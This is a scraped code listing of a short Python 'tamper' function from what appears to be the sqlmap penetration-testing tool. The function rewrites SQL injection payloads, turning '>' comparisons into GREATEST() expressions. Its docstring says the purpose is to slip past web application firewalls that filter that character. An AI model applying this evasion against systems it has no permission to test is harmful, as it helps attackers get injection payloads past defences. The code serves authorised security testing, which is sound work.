Replaces greater than operator ('>') with 'GREATEST' counterpart Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than c
(payload, **kwargs)
| 15 | pass |
| 16 | |
| 17 | def tamper(payload, **kwargs): |
| 18 | """ |
| 19 | Replaces greater than operator ('>') with 'GREATEST' counterpart |
| 20 | |
| 21 | Tested against: |
| 22 | * MySQL 4, 5.0 and 5.5 |
| 23 | * Oracle 10g |
| 24 | * PostgreSQL 8.3, 8.4, 9.0 |
| 25 | |
| 26 | Notes: |
| 27 | * Useful to bypass weak and bespoke web application firewalls that |
| 28 | filter the greater than character |
| 29 | * The GREATEST clause is a widespread SQL command. Hence, this |
| 30 | tamper script should work against majority of databases |
| 31 | |
| 32 | >>> tamper('1 AND A > B') |
| 33 | '1 AND GREATEST(A,B+1)=A' |
| 34 | """ |
| 35 | |
| 36 | retVal = payload |
| 37 | |
| 38 | if payload: |
| 39 | match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) |
| 40 | |
| 41 | if match: |
| 42 | _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3)) |
| 43 | retVal = retVal.replace(match.group(0), _) |
| 44 | |
| 45 | return retVal |